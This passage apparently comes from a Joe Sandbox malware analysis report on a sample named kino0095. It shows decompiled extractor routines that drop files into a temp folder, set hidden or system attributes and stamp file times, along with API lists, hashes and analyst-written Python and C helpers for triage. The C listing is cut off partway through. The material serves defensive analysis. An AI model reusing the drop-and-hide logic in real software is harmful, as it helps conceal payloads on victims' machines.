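Unresolved stack slots (`?`) are kept as `None` so that a flag argument the sandbox could not read is never mis-decoded as zero, and bits outside the table surface as `unknown:` rather than being dropped. The second WaitForSingleObject value is shown by the report as 000000FF while the decompiled source passes 0xffffffff (INFINITE); the script reports what the API list says and does not reconcile the two.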
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: dafaf848afa4269ca7d77ed1a962dc4e35e62e44a3f36ab824246d26e5b0c384
• Instruction ID: ce1e7d0984c003839127b5cbe97802cde288bc59c6a95bb641da7422409e0759
• Opcode Fuzzy Hash: dafaf848afa4269ca7d77ed1a962dc4e35e62e44a3f36ab824246d26e5b0c384
• Instruction Fuzzy Hash: 9531B171750218ABEB709B69DCC8FEB77BCEB94700F1045A9F686E2152C63A4A81CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
E010B51E5(void* __eflags) {
	int _t5;
	void* _t6;
	void* _t28;

	_t1 = E010B468F("UPROMPT", 0, 0) + 1; // 0x1
	_t28 = LocalAlloc(0x40, _t1);
	if(_t28 != 0) {
		if(E010B468F("UPROMPT", _t28, _t29) != 0) {
			_t5 = lstrcmpA(_t28, "<None>"); // executed
			if(_t5 != 0) {
				_t6 = E010B44B9(0, 0x3e9, _t28, 0, 0x20, 4);
				LocalFree(_t28);
				if(_t6 != 6) {
					*0x10b9124 = 0x800704c7;
					L10:
					return 0;
				}
				*0x10b9124 = 0;
				L6:
				return 1;
			}
			LocalFree(_t28);
			goto L6;
		}
		E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
		LocalFree(_t28);
		*0x10b9124 = 0x80070714;
		goto L10;
	}
	E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
	*0x10b9124 = E010B6285();
	goto L10;
}

0x010b51fb
0x010b5207
0x010b520b
0x010b523c
0x010b5268
0x010b5270
0x010b528b
0x010b5293
0x010b529c
0x010b52a6
0x010b52b0
0x00000000
0x010b52b0
0x010b529e
0x010b5279
0x00000000
0x010b527b
0x010b5273
0x00000000
0x010b5273
0x010b524a
0x010b5250
0x010b5256
0x00000000
0x010b5256
0x010b5219
0x010b5223
0x00000000

APIs
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
  • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
  • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
  • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
  • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
  • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010B2F4D,?,00000002,00000000), ref: 010B5201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010B5250
  • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
  • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
  • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
• String ID: <None>$UPROMPT
• API String ID: 957408736-2980973527
• Opcode ID: 89b825fc5d0363581c61f457e2235e05790b8c5ef4433800e6210df5e951a6e5
• Instruction ID: 84677e1845ea5b027beb3771326dfa6d480e698d8f8451a246977c72322039e0
• Opcode Fuzzy Hash: 89b825fc5d0363581c61f457e2235e05790b8c5ef4433800e6210df5e951a6e5
• Instruction Fuzzy Hash: F111B2B1702201ABE3656B759CC9FFB72DDEB89784F00446DFAC2E6184EA7E8C014224
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B1FE1(void* __ecx) {
	void* _v8;
	long _t4;

	if(*0x10b8530 != 0) {
		_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006, &_v8); // executed
		if(_t4 == 0) {
			RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
			return RegCloseKey(_v8);
		}
	}
	return _t4;
}

0x010b1fee
0x010b2005
0x010b200d
0x010b2017
0x00000000
0x010b2020
0x010b200d
0x010b2029

APIs
• RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010B538C,?,?,010B538C), ref: 010B2005
• RegDeleteValueA.KERNELBASE(010B538C,wextract_cleanup1,?,?,010B538C), ref: 010B2017
• RegCloseKey.ADVAPI32(010B538C,?,?,010B538C), ref: 010B2020
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: CloseDeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
• API String ID: 849931509-1592051331
• Opcode ID: cc3927ebe264d36675a0d4c1ddec200b54c0178f46fceb64cf6f09c92dd812ad
• Instruction ID: b45cafd70d0887f36f1dd19471ec7838d425fea6309a9115229c7855fd624a3b
• Opcode Fuzzy Hash: cc3927ebe264d36675a0d4c1ddec200b54c0178f46fceb64cf6f09c92dd812ad
• Instruction Fuzzy Hash: B7E04F30660318FBEB318A91ECCEFD97B6EE704780F100199BA85A1065E7666A10D718
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
			E010B4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x10b8004; // 0x72151d89
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x10b91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E010B4E99(_t75);
						L35:
						return E010B6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x10b8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x10b91e4;
						_t58 = 0x10b91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x10b91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x10b91e4;
						_t30 = E010B4702( &_v268, 0x10b91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E010B476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E010B4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E010B47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x10b93f4 =  *0x10b93f4 + 1;
                                                                                                                                                                                                                                    						_t33 = _t75;
                                                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t44 = _t36 - 1;
                                                                                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                                                    						_t54 = 0x10b91e4;
                                                                                                                                                                                                                                    						_t63 = 0x10b91e4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                    						_t64 = _t63 - 0x10b91e5;
                                                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 = 0x10b91e4;
                                                                                                                                                                                                                                    						_t30 = E010B4702( &_v268, 0x10b91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                    						_t30 = E010B4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						E010B4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t33 = 1;
                                                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                                                    					_t30 = E010B4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                                                    			}
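The fragment above drops a file and then fixes its attributes: the combined name length is rejected when it reaches 0x104 (MAX_PATH), and the value handed to SetFileAttributesA is either the entry's 16-bit attribute word masked with 0x27 (FILE_ATTRIBUTE_READONLY | HIDDEN | SYSTEM | ARCHIVE) or, when that word is zero, 0x80 (FILE_ATTRIBUTE_NORMAL). The following Python model of those two decisions is an added analyst example, not code from the sample or from the Joe Sandbox report. The FILE_ATTRIBUTE_* values and MAX_PATH are documented Windows constants; reading the field at +4 as the entry name, the field at +0x1c as the attribute word, and the "+1" in the length check as a single separator byte are assumptions drawn from the listing. The sample entries are constructed.

```python
# Added example: model of the MAX_PATH check and the SetFileAttributesA value
# selection visible in the decompiled routine. Analyst code, not code from the
# sample or the report. Struct-field meanings and the separator byte are
# assumptions drawn from the listing; the constants are documented Windows values.

MAX_PATH = 0x104  # the routine bails out (goto L3) when the length is >= 0x104

FILE_ATTRIBUTE_READONLY = 0x01
FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04
FILE_ATTRIBUTE_ARCHIVE = 0x20
FILE_ATTRIBUTE_NORMAL = 0x80

# `_t50 & 0x00000027`: only these four bits survive the mask.
ATTRIB_MASK = (FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN
               | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_ARCHIVE)  # == 0x27

_ATTRIB_NAMES = (
    (FILE_ATTRIBUTE_READONLY, "READONLY"),
    (FILE_ATTRIBUTE_HIDDEN, "HIDDEN"),
    (FILE_ATTRIBUTE_SYSTEM, "SYSTEM"),
    (FILE_ATTRIBUTE_ARCHIVE, "ARCHIVE"),
    (FILE_ATTRIBUTE_NORMAL, "NORMAL"),
)


def dropped_attributes(entry_attribs: int) -> int:
    """Value the routine passes to SetFileAttributesA for one entry.

    `*(_t75 + 0x1c) & 0x0000ffff` reads a 16-bit word (assumed: the entry's
    attribute field).  A non-zero word is masked with 0x27; a zero word
    becomes FILE_ATTRIBUTE_NORMAL (0x80).
    """
    word = entry_attribs & 0xFFFF
    return (word & ATTRIB_MASK) if word else FILE_ATTRIBUTE_NORMAL


def decode_attributes(value: int) -> list:
    """Names of the bits set in a SetFileAttributesA value, lowest bit first."""
    return [name for bit, name in _ATTRIB_NAMES if value & bit]


def build_drop_path(base_dir: bytes, name: bytes):
    """Mirror the length check that precedes E010B4702.

    The listing computes strlen(base) + 1 + strlen(name) and refuses the
    entry when that is >= 0x104, so the joined path plus its NUL must fit in
    a MAX_PATH buffer.  Returns None where the routine would bail out.
    """
    if len(base_dir) + 1 + len(name) >= MAX_PATH:
        return None
    return base_dir + b"\\" + name  # single separator byte: an assumption


def triage_entry(base_dir: bytes, name: bytes, entry_attribs: int) -> dict:
    """Summarise what the routine would do with one entry."""
    path = build_drop_path(base_dir, name)
    attrs = dropped_attributes(entry_attribs)
    hidden_or_system = bool(attrs & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
    return {
        "path": path,
        "rejected_for_length": path is None,
        "attributes": attrs,
        "attribute_names": decode_attributes(attrs),
        # a dropped binary marked HIDDEN or SYSTEM is worth flagging in triage
        "hidden_or_system": hidden_or_system,
    }


# Constructed sample entries (not data from the report).
SAMPLE_ENTRIES = [
    (b"C:\\Users\\Public", b"payload.exe", 0x0000),  # zero word -> NORMAL
    (b"C:\\Users\\Public", b"helper.dll", 0x0026),   # HIDDEN|SYSTEM|ARCHIVE
    (b"C:\\Users\\Public", b"tmp.bin", 0x0100),      # bit outside 0x27 -> 0
    (b"x" * 0x100, b"abc", 0x0020),                  # 0x100 + 1 + 3 == 0x104 -> rejected
]


def triage_all(entries=SAMPLE_ENTRIES) -> list:
    return [triage_entry(*entry) for entry in entries]


if __name__ == "__main__":
    for row in triage_all():
        print(row)
```

Note the third sample: an attribute word with only bits outside 0x27 set (0x0100 here) is non-zero, so it does not fall back to FILE_ATTRIBUTE_NORMAL but is masked down to 0 before the SetFileAttributesA call.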

0x010b4cd0
0x010b4cdb
0x010b4ce0
0x010b4ce2
0x010b4cee
0x010b4cf2
0x010b4d0e
0x010b4d0e
0x010b4d11
0x010b4e83
0x010b4e88
0x010b4e98
0x010b4e98
0x010b4d17
0x010b4d17
0x010b4d1a
0x010b4d2f
0x010b4d2f
0x00000000
0x010b4d2f
0x010b4d1c
0x010b4d1c
0x010b4d1f
0x010b4dcb
0x010b4dd0
0x010b4dd2
0x010b4ddd
0x010b4ddd
0x010b4de3
0x010b4de8
0x010b4ded
0x010b4ded
0x010b4def
0x010b4df0
0x010b4df0
0x010b4df4
0x010b4df4
0x010b4df6
0x010b4df9
0x010b4dfc
0x010b4dfc
0x010b4dfe
0x010b4dff
0x010b4dff
0x010b4e03
0x010b4e08
0x010b4e0a
0x010b4e0f
0x010b4d03
0x010b4d03
0x00000000
0x010b4d03
0x010b4e18
0x010b4e20
0x010b4e25
0x010b4e27
0x00000000
0x00000000
                                                                                                                                                                                                                                    0x010b4e33
                                                                                                                                                                                                                                    0x010b4e38
                                                                                                                                                                                                                                    0x010b4e3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e40
                                                                                                                                                                                                                                    0x010b4e51
                                                                                                                                                                                                                                    0x010b4e56
                                                                                                                                                                                                                                    0x010b4e5b
                                                                                                                                                                                                                                    0x010b4e5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e6a
                                                                                                                                                                                                                                    0x010b4e6f
                                                                                                                                                                                                                                    0x010b4e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e77
                                                                                                                                                                                                                                    0x010b4e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e7d
                                                                                                                                                                                                                                    0x010b4d25
                                                                                                                                                                                                                                    0x010b4d25
                                                                                                                                                                                                                                    0x010b4d28
                                                                                                                                                                                                                                    0x010b4d36
                                                                                                                                                                                                                                    0x010b4d3b
                                                                                                                                                                                                                                    0x010b4d40
                                                                                                                                                                                                                                    0x010b4d40
                                                                                                                                                                                                                                    0x010b4d42
                                                                                                                                                                                                                                    0x010b4d43
                                                                                                                                                                                                                                    0x010b4d43
                                                                                                                                                                                                                                    0x010b4d47
                                                                                                                                                                                                                                    0x010b4d4a
                                                                                                                                                                                                                                    0x010b4d4a
                                                                                                                                                                                                                                    0x010b4d4c
                                                                                                                                                                                                                                    0x010b4d4f
                                                                                                                                                                                                                                    0x010b4d4f
                                                                                                                                                                                                                                    0x010b4d51
                                                                                                                                                                                                                                    0x010b4d52
                                                                                                                                                                                                                                    0x010b4d52
                                                                                                                                                                                                                                    0x010b4d56
                                                                                                                                                                                                                                    0x010b4d5b
                                                                                                                                                                                                                                    0x010b4d5d
                                                                                                                                                                                                                                    0x010b4d62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d67
                                                                                                                                                                                                                                    0x010b4d6f
                                                                                                                                                                                                                                    0x010b4d74
                                                                                                                                                                                                                                    0x010b4d76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d7c
                                                                                                                                                                                                                                    0x010b4d84
                                                                                                                                                                                                                                    0x010b4d89
                                                                                                                                                                                                                                    0x010b4d8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d94
                                                                                                                                                                                                                                    0x010b4d99
                                                                                                                                                                                                                                    0x010b4d9e
                                                                                                                                                                                                                                    0x010b4da1
                                                                                                                                                                                                                                    0x010b4daa
                                                                                                                                                                                                                                    0x010b4daa
                                                                                                                                                                                                                                    0x010b4da3
                                                                                                                                                                                                                                    0x010b4da3
                                                                                                                                                                                                                                    0x010b4da3
                                                                                                                                                                                                                                    0x010b4db5
                                                                                                                                                                                                                                    0x010b4dbb
                                                                                                                                                                                                                                    0x010b4dbd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4dc3
                                                                                                                                                                                                                                    0x010b4dc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4dc5
                                                                                                                                                                                                                                    0x010b4dbd
                                                                                                                                                                                                                                    0x010b4d2a
                                                                                                                                                                                                                                    0x010b4d2a
                                                                                                                                                                                                                                    0x010b4d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d2d
                                                                                                                                                                                                                                    0x010b4cf8
                                                                                                                                                                                                                                    0x010b4cfd
                                                                                                                                                                                                                                    0x010b4d02
                                                                                                                                                                                                                                    0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010B4DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010B4DDD
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
• API String ID: 3625706803-1116576409
• Opcode ID: fe24079b8ce9c2ea0f017202e6caf22a68b39732e1908f065c44c7eb611f1faf
• Instruction ID: e70bb3be2fd84247dd42a27cc039fc24cc0e89bae9b648dbccd0e4f4614b3787
• Opcode Fuzzy Hash: fe24079b8ce9c2ea0f017202e6caf22a68b39732e1908f065c44c7eb611f1faf
• Instruction Fuzzy Hash: F44122362041068BDF62AE3CD9D46F9B7E5EB45300F0486A8D9D3D7287DA32DB8AC750
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B4C37(signed int __ecx, int __edx, int _a4) {
	struct _FILETIME _v12;
	struct _FILETIME _v20;
	FILETIME* _t14;
	int _t15;
	signed int _t21;

	_t21 = __ecx * 0x18;
	if( *((intOrPtr*)(_t21 + 0x10b8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
		L5:
		return 0;
	} else {
		_t14 =  &_v12;
		_t15 = SetFileTime( *(_t21 + 0x10b8d74), _t14, _t14, _t14); // executed
		if(_t15 == 0) {
			goto L5;
		}
		return 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}








Statement addresses: 0x010b4c40 0x010b4c4a 0x010b4c8d 0x00000000 0x010b4c70 0x010b4c70 0x010b4c7e 0x010b4c86 0x00000000 0x00000000 0x00000000 0x010b4c8a

APIs
• DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010B4C54
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010B4C66
• SetFileTime.KERNELBASE(?,?,?,?), ref: 010B4C7E
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: b4cb04e1a79da18ca87fc2b45c89bd2b145ac6ebc023e7ef8daff13eebe4dbae
• Instruction ID: 0c82a3a84b9cc782e864a9d9398d3206be875b13a766e4640a3d269a387a4014
• Opcode Fuzzy Hash: b4cb04e1a79da18ca87fc2b45c89bd2b145ac6ebc023e7ef8daff13eebe4dbae
• Instruction Fuzzy Hash: 15F0967260010DBFABA4DFA8CCC8DFB7BEDEB04640744456BA996C2011EA35DA14C770
Uniqueness

Uniqueness Score: -1.00%
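The function above takes a packed 16-bit DOS date (edx) and DOS time (_a4), converts them with DosDateTimeToFileTime, treats the result as local time (LocalFileTimeToFileTime), and stamps the handle stored in the 0x18-byte-stride table at 0x10b8d74 with that value for creation, access and write time. For an analyst the caveat is that any timestamp written this way has 2-second resolution, cannot predate 1980, and was shifted by the sandbox machine's time zone, so those files will not carry the real extraction time. The following C is an added example, not code from the report or from the sample: it reimplements the DOS-to-FILETIME conversion portably so the packed format can be checked off-Windows. It skips the LocalFileTimeToFileTime step, i.e. it reads the DOS value as UTC, and the sample values are constructed.

```c
#include <stdint.h>
#include <stdio.h>

/* Packed DOS date: bits 15-9 = year - 1980, bits 8-5 = month (1-12), bits 4-0 = day (1-31).
 * Packed DOS time: bits 15-11 = hour, bits 10-5 = minute, bits 4-0 = second / 2.
 * This is the pair DosDateTimeToFileTime() consumes. */
typedef struct {
    int year, month, day, hour, minute, second;
} dos_datetime;

dos_datetime dos_decode(uint16_t dos_date, uint16_t dos_time) {
    dos_datetime dt;
    dt.year   = 1980 + ((dos_date >> 9) & 0x7f);   /* nothing before 1980 is representable */
    dt.month  = (dos_date >> 5) & 0x0f;
    dt.day    = dos_date & 0x1f;
    dt.hour   = (dos_time >> 11) & 0x1f;
    dt.minute = (dos_time >> 5) & 0x3f;
    dt.second = (dos_time & 0x1f) * 2;           /* 2-second granularity */
    return dt;
}

/* Days from 1970-01-01 to a proleptic Gregorian civil date (Howard Hinnant's algorithm). */
static int64_t days_from_civil(int64_t y, int64_t m, int64_t d) {
    y -= m <= 2;
    int64_t era = (y >= 0 ? y : y - 399) / 400;
    int64_t yoe = y - era * 400;
    int64_t doy = (153 * (m + (m > 2 ? -3 : 9)) + 2) / 5 + d - 1;
    int64_t doe = yoe * 365 + yoe / 4 - yoe / 100 + doy;
    return era * 146097 + doe - 719468;
}

/* 1970-01-01 expressed as a FILETIME (100 ns ticks since 1601-01-01 UTC). */
#define UNIX_EPOCH_AS_FILETIME 116444736000000000LL

/* Equivalent of DosDateTimeToFileTime() without the LocalFileTimeToFileTime() step:
 * the DOS value is taken as UTC. Returns 0 for fields the Win32 call would reject. */
uint64_t dos_to_filetime(uint16_t dos_date, uint16_t dos_time) {
    dos_datetime dt = dos_decode(dos_date, dos_time);
    if (dt.month < 1 || dt.month > 12 || dt.day < 1 || dt.day > 31 ||
        dt.hour > 23 || dt.minute > 59 || dt.second > 59)
        return 0;
    int64_t days = days_from_civil(dt.year, dt.month, dt.day);
    int64_t secs = days * 86400 + dt.hour * 3600 + dt.minute * 60 + dt.second;
    return (uint64_t)(secs * 10000000LL + UNIX_EPOCH_AS_FILETIME);
}

int main(void) {
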